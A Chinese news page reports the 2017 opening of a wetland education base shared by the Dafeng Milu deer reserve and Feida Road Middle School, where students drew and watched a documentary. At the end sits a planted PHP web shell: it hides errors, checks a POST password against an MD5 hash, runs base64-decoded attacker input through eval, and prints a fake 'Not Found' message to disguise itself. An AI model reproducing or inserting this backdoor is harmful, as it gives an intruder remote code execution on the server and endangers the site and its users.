最新要闻

首页 > 最新要闻 >

    江苏省大丰麋鹿国家级自然保护区与飞达路中学湿地教育基地正式揭牌

           2017年11月18日,江苏省大丰麋鹿国家级自然保护区与飞达路中学湿地教育基地揭牌仪式在中华麋鹿园景区内举行。上午9时,中华麋鹿园总经理许国新和飞达路中学校长韦卫在景区内杨国美摄影馆前共同揭牌。随后,韦校长和学生代表向保护区赠送学生作品和画册,保护区为麋鹿系列作品征集活动获奖学生颁发奖状。


           学生们步行至麋鹿文化大观园,在讲解员的解说下,对麋鹿文化有了更深刻的了解。他们还拿出画板和画笔,在麋鹿群雕前现场临摹。最后,学生们来到游客中心,观看了纪录片《归来的麋鹿》,他们在大厅现场作画,引来很多游客驻足观赏,学校将完成的学生作品全部赠送给麋鹿保护区作为留念。
           飞达路初级中学作为中国第一所湿地实验中学,与麋鹿保护区合作密切。此次湿地教育基地的正式揭牌将会促进麋鹿保护区与飞达路中学今后的交流与发展。

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>